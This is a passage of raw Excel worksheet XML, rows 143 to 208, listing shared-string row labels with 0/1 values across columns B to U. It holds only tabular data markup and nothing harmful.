        <v>146</v>
      </c>
      <c r="B143" s="1">
        <v>1</v>
      </c>
      <c r="C143" s="12">
        <v>0</v>
      </c>
      <c r="D143" s="9">
        <v>0</v>
      </c>
      <c r="E143" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U143" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="144" spans="1:21" ht="24">
      <c r="A144" s="7" t="s">
        <v>147</v>
      </c>
      <c r="B144" s="1">
        <v>1</v>
      </c>
      <c r="C144" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U144" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="145" spans="1:21">
      <c r="A145" s="7" t="s">
        <v>148</v>
      </c>
      <c r="B145" s="1">
        <v>1</v>
      </c>
      <c r="C145" s="12">
        <v>0</v>
      </c>
      <c r="D145" s="9">
        <v>0</v>
      </c>
      <c r="E145" s="9">
        <v>0</v>
      </c>
      <c r="F145" s="9">
        <v>1</v>
      </c>
      <c r="G145" s="9">
        <v>0</v>
      </c>
      <c r="H145" s="9">
        <v>1</v>
      </c>
      <c r="I145" s="9">
        <v>0</v>
      </c>
      <c r="J145" s="9">
        <v>0</v>
      </c>
      <c r="K145" s="9">
        <v>0</v>
      </c>
      <c r="L145" s="9">
        <v>0</v>
      </c>
      <c r="M145" s="1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7">
        <v>0</v>
      </c>
      <c r="U145" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="146" spans="1:21" ht="24">
      <c r="A146" s="7" t="s">
        <v>149</v>
      </c>
      <c r="B146" s="1">
        <v>0</v>
      </c>
      <c r="C146" s="12">
        <v>0</v>
      </c>
      <c r="D146" s="9">
        <v>0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1</v>
      </c>
      <c r="L146" s="9">
        <v>0</v>
      </c>
      <c r="M146" s="1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7">
        <v>0</v>
      </c>
      <c r="U146" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="147" spans="1:21" ht="24">
      <c r="A147" s="7" t="s">
        <v>150</v>
      </c>
      <c r="B147" s="1">
        <v>1</v>
      </c>
      <c r="C147" s="12">
        <v>0</v>
      </c>
      <c r="D147" s="9">
        <v>0</v>
      </c>
      <c r="E147" s="9">
        <v>0</v>
      </c>
      <c r="F147" s="9">
        <v>1</v>
      </c>
      <c r="G147" s="9">
        <v>0</v>
      </c>
      <c r="H147" s="9">
        <v>1</v>
      </c>
      <c r="I147" s="9">
        <v>0</v>
      </c>
      <c r="J147" s="9">
        <v>0</v>
      </c>
      <c r="K147" s="9">
        <v>0</v>
      </c>
      <c r="L147" s="9">
        <v>0</v>
      </c>
      <c r="M147" s="1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7">
        <v>0</v>
      </c>
      <c r="U147" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="148" spans="1:21" ht="24">
      <c r="A148" s="7" t="s">
        <v>151</v>
      </c>
      <c r="B148" s="1">
        <v>1</v>
      </c>
      <c r="C148" s="12">
        <v>1</v>
      </c>
      <c r="D148" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U148" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="149" spans="1:21" ht="24">
      <c r="A149" s="7" t="s">
        <v>152</v>
      </c>
      <c r="B149" s="1">
        <v>1</v>
      </c>
      <c r="C149" s="12">
        <v>1</v>
      </c>
      <c r="D149" s="9">
        <v>0</v>
      </c>
      <c r="E149" s="9">
        <v>0</v>
      </c>
      <c r="F149" s="9">
        <v>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1">
        <v>0</v>
      </c>
      <c r="N149" s="12">
        <v>0</v>
      </c>
      <c r="O149" s="12">
        <v>0</v>
      </c>
      <c r="P149" s="12">
        <v>0</v>
      </c>
      <c r="Q149" s="12">
        <v>1</v>
      </c>
      <c r="R149" s="12">
        <v>0</v>
      </c>
      <c r="S149" s="12">
        <v>0</v>
      </c>
      <c r="T149" s="17">
        <v>0</v>
      </c>
      <c r="U149" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="150" spans="1:21">
      <c r="A150" s="7" t="s">
        <v>153</v>
      </c>
      <c r="B150" s="1">
        <v>1</v>
      </c>
      <c r="C150" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U150" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="151" spans="1:21">
      <c r="A151" s="7" t="s">
        <v>154</v>
      </c>
      <c r="B151" s="1">
        <v>0</v>
      </c>
      <c r="C151" s="12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0</v>
      </c>
      <c r="M151" s="1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7">
        <v>0</v>
      </c>
      <c r="U151" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="152" spans="1:21" ht="24">
      <c r="A152" s="7" t="s">
        <v>155</v>
      </c>
      <c r="B152" s="1">
        <v>1</v>
      </c>
      <c r="C152" s="12">
        <v>1</v>
      </c>
      <c r="D152" s="9">
        <v>0</v>
      </c>
      <c r="E152" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U152" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="153" spans="1:21" ht="24">
      <c r="A153" s="7" t="s">
        <v>156</v>
      </c>
      <c r="B153" s="1">
        <v>1</v>
      </c>
      <c r="C153" s="12">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N153" s="12">
        <v>0</v>
      </c>
      <c r="O153" s="12">
        <v>0</v>
      </c>
      <c r="P153" s="12">
        <v>0</v>
      </c>
      <c r="Q153" s="12">
        <v>1</v>
      </c>
      <c r="R153" s="12">
        <v>0</v>
      </c>
      <c r="S153" s="12">
        <v>0</v>
      </c>
      <c r="T153" s="17">
        <v>0</v>
      </c>
      <c r="U153" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="154" spans="1:21">
      <c r="A154" s="7" t="s">
        <v>157</v>
      </c>
      <c r="B154" s="1">
        <v>1</v>
      </c>
      <c r="C154" s="12">
        <v>0</v>
      </c>
      <c r="D154" s="9">
        <v>0</v>
      </c>
      <c r="E154" s="9">
        <v>0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>
        <v>0</v>
      </c>
      <c r="L154" s="9">
        <v>0</v>
      </c>
      <c r="M154" s="1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7">
        <v>0</v>
      </c>
      <c r="U154" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="155" spans="1:21">
      <c r="A155" s="7" t="s">
        <v>158</v>
      </c>
      <c r="B155" s="1">
        <v>1</v>
      </c>
      <c r="C155" s="12">
        <v>0</v>
      </c>
      <c r="D155" s="9">
        <v>0</v>
      </c>
      <c r="E155" s="9">
        <v>0</v>
      </c>
      <c r="F155" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U155" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="156" spans="1:21" ht="24">
      <c r="A156" s="7" t="s">
        <v>159</v>
      </c>
      <c r="B156" s="1">
        <v>1</v>
      </c>
      <c r="C156" s="12">
        <v>0</v>
      </c>
      <c r="D156" s="9">
        <v>0</v>
      </c>
      <c r="E156" s="9">
        <v>0</v>
      </c>
      <c r="F156" s="9">
        <v>0</v>
      </c>
      <c r="G156" s="9">
        <v>0</v>
      </c>
      <c r="H156" s="9">
        <v>1</v>
      </c>
      <c r="I156" s="9">
        <v>0</v>
      </c>
      <c r="J156" s="9">
        <v>0</v>
      </c>
      <c r="K156" s="9">
        <v>0</v>
      </c>
      <c r="L156" s="9">
        <v>0</v>
      </c>
      <c r="M156" s="1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7">
        <v>0</v>
      </c>
      <c r="U156" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="157" spans="1:21" ht="72">
      <c r="A157" s="7" t="s">
        <v>160</v>
      </c>
      <c r="B157" s="1">
        <v>0</v>
      </c>
      <c r="C157" s="12">
        <v>0</v>
      </c>
      <c r="D157" s="9">
        <v>0</v>
      </c>
      <c r="E157" s="9">
        <v>1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1</v>
      </c>
      <c r="M157" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U157" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="158" spans="1:21">
      <c r="A158" s="7" t="s">
        <v>161</v>
      </c>
      <c r="B158" s="1">
        <v>1</v>
      </c>
      <c r="C158" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U158" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="159" spans="1:21" ht="24">
      <c r="A159" s="7" t="s">
        <v>162</v>
      </c>
      <c r="B159" s="1">
        <v>1</v>
      </c>
      <c r="C159" s="12">
        <v>0</v>
      </c>
      <c r="D159" s="9">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U159" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="160" spans="1:21" ht="24">
      <c r="A160" s="7" t="s">
        <v>163</v>
      </c>
      <c r="B160" s="1">
        <v>1</v>
      </c>
      <c r="C160" s="12">
        <v>1</v>
      </c>
      <c r="D160" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U160" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="161" spans="1:21">
      <c r="A161" s="7" t="s">
        <v>164</v>
      </c>
      <c r="B161" s="1">
        <v>1</v>
      </c>
      <c r="C161" s="12">
        <v>0</v>
      </c>
      <c r="D161" s="9">
        <v>0</v>
      </c>
      <c r="E161" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U161" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="162" spans="1:21" ht="24">
      <c r="A162" s="7" t="s">
        <v>165</v>
      </c>
      <c r="B162" s="1">
        <v>1</v>
      </c>
      <c r="C162" s="12">
        <v>1</v>
      </c>
      <c r="D162" s="9">
        <v>0</v>
      </c>
      <c r="E162" s="9">
        <v>1</v>
      </c>
      <c r="F162" s="9">
        <v>1</v>
      </c>
      <c r="G162" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U162" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="163" spans="1:21" ht="60">
      <c r="A163" s="7" t="s">
        <v>166</v>
      </c>
      <c r="B163" s="1">
        <v>0</v>
      </c>
      <c r="C163" s="12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1</v>
      </c>
      <c r="M163" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U163" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="164" spans="1:21" ht="24">
      <c r="A164" s="7" t="s">
        <v>167</v>
      </c>
      <c r="B164" s="1">
        <v>1</v>
      </c>
      <c r="C164" s="12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7">
        <v>0</v>
      </c>
      <c r="U164" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="165" spans="1:21" ht="36">
      <c r="A165" s="7" t="s">
        <v>168</v>
      </c>
      <c r="B165" s="1">
        <v>1</v>
      </c>
      <c r="C165" s="12">
        <v>0</v>
      </c>
      <c r="D165" s="9">
        <v>0</v>
      </c>
      <c r="E165" s="9">
        <v>0</v>
      </c>
      <c r="F165" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U165" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="166" spans="1:21">
      <c r="A166" s="7" t="s">
        <v>169</v>
      </c>
      <c r="B166" s="1">
        <v>0</v>
      </c>
      <c r="C166" s="12">
        <v>0</v>
      </c>
      <c r="D166" s="9">
        <v>0</v>
      </c>
      <c r="E166" s="9">
        <v>1</v>
      </c>
      <c r="F166" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U166" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="167" spans="1:21" ht="24">
      <c r="A167" s="7" t="s">
        <v>170</v>
      </c>
      <c r="B167" s="1">
        <v>1</v>
      </c>
      <c r="C167" s="12">
        <v>0</v>
      </c>
      <c r="D167" s="9">
        <v>0</v>
      </c>
      <c r="E167" s="9">
        <v>0</v>
      </c>
      <c r="F167" s="9">
        <v>1</v>
      </c>
      <c r="G167" s="9">
        <v>0</v>
      </c>
      <c r="H167" s="9">
        <v>1</v>
      </c>
      <c r="I167" s="9">
        <v>0</v>
      </c>
      <c r="J167" s="9">
        <v>0</v>
      </c>
      <c r="K167" s="9">
        <v>0</v>
      </c>
      <c r="L167" s="9">
        <v>0</v>
      </c>
      <c r="M167" s="1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7">
        <v>0</v>
      </c>
      <c r="U167" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="168" spans="1:21">
      <c r="A168" s="7" t="s">
        <v>171</v>
      </c>
      <c r="B168" s="1">
        <v>1</v>
      </c>
      <c r="C168" s="12">
        <v>0</v>
      </c>
      <c r="D168" s="9">
        <v>0</v>
      </c>
      <c r="E168" s="9">
        <v>0</v>
      </c>
      <c r="F168" s="9">
        <v>1</v>
      </c>
      <c r="G168" s="9">
        <v>0</v>
      </c>
      <c r="H168" s="9">
        <v>1</v>
      </c>
      <c r="I168" s="9">
        <v>0</v>
      </c>
      <c r="J168" s="9">
        <v>0</v>
      </c>
      <c r="K168" s="9">
        <v>0</v>
      </c>
      <c r="L168" s="9">
        <v>0</v>
      </c>
      <c r="M168" s="1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7">
        <v>0</v>
      </c>
      <c r="U168" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="169" spans="1:21" ht="24">
      <c r="A169" s="7" t="s">
        <v>172</v>
      </c>
      <c r="B169" s="1">
        <v>1</v>
      </c>
      <c r="C169" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U169" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="170" spans="1:21" ht="24">
      <c r="A170" s="7" t="s">
        <v>173</v>
      </c>
      <c r="B170" s="1">
        <v>1</v>
      </c>
      <c r="C170" s="12">
        <v>1</v>
      </c>
      <c r="D170" s="9">
        <v>0</v>
      </c>
      <c r="E170" s="9">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U170" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="171" spans="1:21" ht="24">
      <c r="A171" s="7" t="s">
        <v>174</v>
      </c>
      <c r="B171" s="1">
        <v>1</v>
      </c>
      <c r="C171" s="12">
        <v>1</v>
      </c>
      <c r="D171" s="9">
        <v>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1">
        <v>0</v>
      </c>
      <c r="N171" s="12">
        <v>0</v>
      </c>
      <c r="O171" s="12">
        <v>1</v>
      </c>
      <c r="P171" s="12">
        <v>0</v>
      </c>
      <c r="Q171" s="12">
        <v>0</v>
      </c>
      <c r="R171" s="12">
        <v>0</v>
      </c>
      <c r="S171" s="12">
        <v>0</v>
      </c>
      <c r="T171" s="17">
        <v>0</v>
      </c>
      <c r="U171" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="172" spans="1:21">
      <c r="A172" s="7" t="s">
        <v>175</v>
      </c>
      <c r="B172" s="1">
        <v>0</v>
      </c>
      <c r="C172" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U172" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="173" spans="1:21" ht="24">
      <c r="A173" s="7" t="s">
        <v>176</v>
      </c>
      <c r="B173" s="1">
        <v>1</v>
      </c>
      <c r="C173" s="12">
        <v>1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1</v>
      </c>
      <c r="S173" s="12">
        <v>0</v>
      </c>
      <c r="T173" s="17">
        <v>0</v>
      </c>
      <c r="U173" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="174" spans="1:21" ht="24">
      <c r="A174" s="7" t="s">
        <v>177</v>
      </c>
      <c r="B174" s="1">
        <v>1</v>
      </c>
      <c r="C174" s="12">
        <v>0</v>
      </c>
      <c r="D174" s="9">
        <v>0</v>
      </c>
      <c r="E174" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U174" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="175" spans="1:21" ht="24">
      <c r="A175" s="7" t="s">
        <v>178</v>
      </c>
      <c r="B175" s="1">
        <v>1</v>
      </c>
      <c r="C175" s="12">
        <v>0</v>
      </c>
      <c r="D175" s="9">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U175" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="176" spans="1:21" ht="24">
      <c r="A176" s="7" t="s">
        <v>179</v>
      </c>
      <c r="B176" s="1">
        <v>1</v>
      </c>
      <c r="C176" s="12">
        <v>0</v>
      </c>
      <c r="D176" s="9">
        <v>0</v>
      </c>
      <c r="E176" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U176" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="177" spans="1:21">
      <c r="A177" s="7" t="s">
        <v>180</v>
      </c>
      <c r="B177" s="1">
        <v>1</v>
      </c>
      <c r="C177" s="12">
        <v>0</v>
      </c>
      <c r="D177" s="9">
        <v>0</v>
      </c>
      <c r="E177" s="9">
        <v>0</v>
      </c>
      <c r="F177" s="9">
        <v>1</v>
      </c>
      <c r="G177" s="9">
        <v>0</v>
      </c>
      <c r="H177" s="9">
        <v>1</v>
      </c>
      <c r="I177" s="9">
        <v>0</v>
      </c>
      <c r="J177" s="9">
        <v>0</v>
      </c>
      <c r="K177" s="9">
        <v>0</v>
      </c>
      <c r="L177" s="9">
        <v>0</v>
      </c>
      <c r="M177" s="1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7">
        <v>0</v>
      </c>
      <c r="U177" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="178" spans="1:21">
      <c r="A178" s="7" t="s">
        <v>181</v>
      </c>
      <c r="B178" s="1">
        <v>0</v>
      </c>
      <c r="C178" s="12">
        <v>0</v>
      </c>
      <c r="D178" s="9">
        <v>0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1</v>
      </c>
      <c r="M178" s="1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7">
        <v>0</v>
      </c>
      <c r="U178" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:21" ht="24">
      <c r="A179" s="7" t="s">
        <v>182</v>
      </c>
      <c r="B179" s="1">
        <v>1</v>
      </c>
      <c r="C179" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U179" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:21">
      <c r="A180" s="7" t="s">
        <v>183</v>
      </c>
      <c r="B180" s="1">
        <v>1</v>
      </c>
      <c r="C180" s="12">
        <v>0</v>
      </c>
      <c r="D180" s="9">
        <v>0</v>
      </c>
      <c r="E180" s="9">
        <v>0</v>
      </c>
      <c r="F180" s="9">
        <v>1</v>
      </c>
      <c r="G180" s="9">
        <v>0</v>
      </c>
      <c r="H180" s="9">
        <v>1</v>
      </c>
      <c r="I180" s="9">
        <v>1</v>
      </c>
      <c r="J180" s="9">
        <v>0</v>
      </c>
      <c r="K180" s="9">
        <v>0</v>
      </c>
      <c r="L180" s="9">
        <v>0</v>
      </c>
      <c r="M180" s="1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7">
        <v>0</v>
      </c>
      <c r="U180" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="181" spans="1:21">
      <c r="A181" s="7" t="s">
        <v>184</v>
      </c>
      <c r="B181" s="1">
        <v>1</v>
      </c>
      <c r="C181" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U181" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="182" spans="1:21" ht="24">
      <c r="A182" s="7" t="s">
        <v>185</v>
      </c>
      <c r="B182" s="1">
        <v>1</v>
      </c>
      <c r="C182" s="12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7">
        <v>1</v>
      </c>
      <c r="U182" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="183" spans="1:21">
      <c r="A183" s="7" t="s">
        <v>186</v>
      </c>
      <c r="B183" s="1">
        <v>0</v>
      </c>
      <c r="C183" s="12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1</v>
      </c>
      <c r="L183" s="9">
        <v>0</v>
      </c>
      <c r="M183" s="1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7">
        <v>0</v>
      </c>
      <c r="U183" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="184" spans="1:21" ht="24">
      <c r="A184" s="7" t="s">
        <v>187</v>
      </c>
      <c r="B184" s="1">
        <v>1</v>
      </c>
      <c r="C184" s="12">
        <v>0</v>
      </c>
      <c r="D184" s="9">
        <v>0</v>
      </c>
      <c r="E184" s="9">
        <v>0</v>
      </c>
      <c r="F184" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U184" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="185" spans="1:21" ht="24">
      <c r="A185" s="7" t="s">
        <v>188</v>
      </c>
      <c r="B185" s="1">
        <v>1</v>
      </c>
      <c r="C185" s="12">
        <v>0</v>
      </c>
      <c r="D185" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U185" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:21">
      <c r="A186" s="7" t="s">
        <v>189</v>
      </c>
      <c r="B186" s="1">
        <v>1</v>
      </c>
      <c r="C186" s="12">
        <v>1</v>
      </c>
      <c r="D186" s="9">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N186" s="12">
        <v>0</v>
      </c>
      <c r="O186" s="12">
        <v>0</v>
      </c>
      <c r="P186" s="12">
        <v>1</v>
      </c>
      <c r="Q186" s="12">
        <v>0</v>
      </c>
      <c r="R186" s="12">
        <v>0</v>
      </c>
      <c r="S186" s="12">
        <v>0</v>
      </c>
      <c r="T186" s="17">
        <v>0</v>
      </c>
      <c r="U186" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="187" spans="1:21" ht="24">
      <c r="A187" s="7" t="s">
        <v>190</v>
      </c>
      <c r="B187" s="1">
        <v>1</v>
      </c>
      <c r="C187" s="12">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U187" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="188" spans="1:21">
      <c r="A188" s="7" t="s">
        <v>191</v>
      </c>
      <c r="B188" s="1">
        <v>1</v>
      </c>
      <c r="C188" s="12">
        <v>0</v>
      </c>
      <c r="D188" s="9">
        <v>0</v>
      </c>
      <c r="E188" s="9">
        <v>0</v>
      </c>
      <c r="F188" s="9">
        <v>1</v>
      </c>
      <c r="G188" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U188" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="189" spans="1:21" ht="24">
      <c r="A189" s="7" t="s">
        <v>192</v>
      </c>
      <c r="B189" s="1">
        <v>1</v>
      </c>
      <c r="C189" s="12">
        <v>0</v>
      </c>
      <c r="D189" s="9">
        <v>0</v>
      </c>
      <c r="E189" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U189" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="190" spans="1:21" ht="24">
      <c r="A190" s="7" t="s">
        <v>193</v>
      </c>
      <c r="B190" s="1">
        <v>0</v>
      </c>
      <c r="C190" s="12">
        <v>0</v>
      </c>
      <c r="D190" s="9">
        <v>0</v>
      </c>
      <c r="E190" s="9">
        <v>0</v>
      </c>
      <c r="F190" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U190" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="191" spans="1:21">
      <c r="A191" s="7" t="s">
        <v>194</v>
      </c>
      <c r="B191" s="1">
        <v>0</v>
      </c>
      <c r="C191" s="12">
        <v>0</v>
      </c>
      <c r="D191" s="9">
        <v>0</v>
      </c>
      <c r="E191" s="9">
        <v>0</v>
      </c>
      <c r="F191" s="9">
        <v>1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9">
        <v>0</v>
      </c>
      <c r="M191" s="1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7">
        <v>0</v>
      </c>
      <c r="U191" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="192" spans="1:21" ht="24">
      <c r="A192" s="7" t="s">
        <v>195</v>
      </c>
      <c r="B192" s="1">
        <v>1</v>
      </c>
      <c r="C192" s="12">
        <v>0</v>
      </c>
      <c r="D192" s="9">
        <v>0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1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7">
        <v>1</v>
      </c>
      <c r="U192" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="193" spans="1:21">
      <c r="A193" s="7" t="s">
        <v>196</v>
      </c>
      <c r="B193" s="1">
        <v>1</v>
      </c>
      <c r="C193" s="12">
        <v>0</v>
      </c>
      <c r="D193" s="9">
        <v>0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>
        <v>0</v>
      </c>
      <c r="K193" s="9">
        <v>0</v>
      </c>
      <c r="L193" s="9">
        <v>0</v>
      </c>
      <c r="M193" s="1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7">
        <v>0</v>
      </c>
      <c r="U193" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="194" spans="1:21">
      <c r="A194" s="7" t="s">
        <v>197</v>
      </c>
      <c r="B194" s="1">
        <v>0</v>
      </c>
      <c r="C194" s="12">
        <v>0</v>
      </c>
      <c r="D194" s="9">
        <v>0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1</v>
      </c>
      <c r="M194" s="1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7">
        <v>0</v>
      </c>
      <c r="U194" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="195" spans="1:21" ht="36">
      <c r="A195" s="7" t="s">
        <v>198</v>
      </c>
      <c r="B195" s="1">
        <v>1</v>
      </c>
      <c r="C195" s="12">
        <v>1</v>
      </c>
      <c r="D195" s="9">
        <v>0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1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1</v>
      </c>
      <c r="S195" s="12">
        <v>0</v>
      </c>
      <c r="T195" s="17">
        <v>0</v>
      </c>
      <c r="U195" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="196" spans="1:21">
      <c r="A196" s="7" t="s">
        <v>199</v>
      </c>
      <c r="B196" s="1">
        <v>0</v>
      </c>
      <c r="C196" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U196" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="197" spans="1:21" ht="24">
      <c r="A197" s="7" t="s">
        <v>200</v>
      </c>
      <c r="B197" s="1">
        <v>1</v>
      </c>
      <c r="C197" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U197" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="198" spans="1:21" ht="24">
      <c r="A198" s="7" t="s">
        <v>201</v>
      </c>
      <c r="B198" s="1">
        <v>1</v>
      </c>
      <c r="C198" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U198" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="199" spans="1:21">
      <c r="A199" s="7" t="s">
        <v>202</v>
      </c>
      <c r="B199" s="1">
        <v>1</v>
      </c>
      <c r="C199" s="12">
        <v>0</v>
      </c>
      <c r="D199" s="9">
        <v>0</v>
      </c>
      <c r="E199" s="9">
        <v>0</v>
      </c>
      <c r="F199" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U199" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="200" spans="1:21">
      <c r="A200" s="7" t="s">
        <v>203</v>
      </c>
      <c r="B200" s="1">
        <v>1</v>
      </c>
      <c r="C200" s="12">
        <v>0</v>
      </c>
      <c r="D200" s="9">
        <v>0</v>
      </c>
      <c r="E200" s="9">
        <v>0</v>
      </c>
      <c r="F200" s="9">
        <v>0</v>
      </c>
      <c r="G200" s="9">
        <v>0</v>
      </c>
      <c r="H200" s="9">
        <v>1</v>
      </c>
      <c r="I200" s="9">
        <v>0</v>
      </c>
      <c r="J200" s="9">
        <v>0</v>
      </c>
      <c r="K200" s="9">
        <v>0</v>
      </c>
      <c r="L200" s="9">
        <v>1</v>
      </c>
      <c r="M200" s="1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7">
        <v>0</v>
      </c>
      <c r="U200" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="201" spans="1:21" ht="24">
      <c r="A201" s="7" t="s">
        <v>204</v>
      </c>
      <c r="B201" s="1">
        <v>1</v>
      </c>
      <c r="C201" s="12">
        <v>1</v>
      </c>
      <c r="D201" s="9">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N201" s="12">
        <v>0</v>
      </c>
      <c r="O201" s="12">
        <v>0</v>
      </c>
      <c r="P201" s="12">
        <v>0</v>
      </c>
      <c r="Q201" s="12">
        <v>1</v>
      </c>
      <c r="R201" s="12">
        <v>0</v>
      </c>
      <c r="S201" s="12">
        <v>0</v>
      </c>
      <c r="T201" s="17">
        <v>0</v>
      </c>
      <c r="U201" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="202" spans="1:21" ht="24">
      <c r="A202" s="7" t="s">
        <v>205</v>
      </c>
      <c r="B202" s="1">
        <v>1</v>
      </c>
      <c r="C202" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U202" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="203" spans="1:21">
      <c r="A203" s="7" t="s">
        <v>206</v>
      </c>
      <c r="B203" s="1">
        <v>1</v>
      </c>
      <c r="C203" s="12">
        <v>0</v>
      </c>
      <c r="D203" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U203" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="204" spans="1:21" ht="24">
      <c r="A204" s="7" t="s">
        <v>207</v>
      </c>
      <c r="B204" s="1">
        <v>0</v>
      </c>
      <c r="C204" s="12">
        <v>0</v>
      </c>
      <c r="D204" s="9">
        <v>0</v>
      </c>
      <c r="E204" s="9">
        <v>1</v>
      </c>
      <c r="F204" s="9">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U204" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="205" spans="1:21">
      <c r="A205" s="7" t="s">
        <v>208</v>
      </c>
      <c r="B205" s="1">
        <v>0</v>
      </c>
      <c r="C205" s="12">
        <v>0</v>
      </c>
      <c r="D205" s="9">
        <v>0</v>
      </c>
      <c r="E205" s="9">
        <v>0</v>
      </c>
      <c r="F205" s="9">
        <v>1</v>
      </c>
      <c r="G205" s="9">
        <v>0</v>
      </c>
      <c r="H205" s="9">
        <v>0</v>
      </c>
      <c r="I205" s="9">
        <v>1</v>
      </c>
      <c r="J205" s="9">
        <v>0</v>
      </c>
      <c r="K205" s="9">
        <v>0</v>
      </c>
      <c r="L205" s="9">
        <v>0</v>
      </c>
      <c r="M205" s="1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7">
        <v>0</v>
      </c>
      <c r="U205" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="206" spans="1:21">
      <c r="A206" s="7" t="s">
        <v>209</v>
      </c>
      <c r="B206" s="1">
        <v>1</v>
      </c>
      <c r="C206" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U206" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="207" spans="1:21">
      <c r="A207" s="7" t="s">
        <v>210</v>
      </c>
      <c r="B207" s="1">
        <v>0</v>
      </c>
      <c r="C207" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U207" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="208" spans="1:21">
      <c r="A208" s="7" t="s">
        <v>211</v>
      </c>
      <c r="B208" s="1">
        <v>1</v>
      </c>
      <c r="C208" s="12">
        <v>0</v>
      </c>
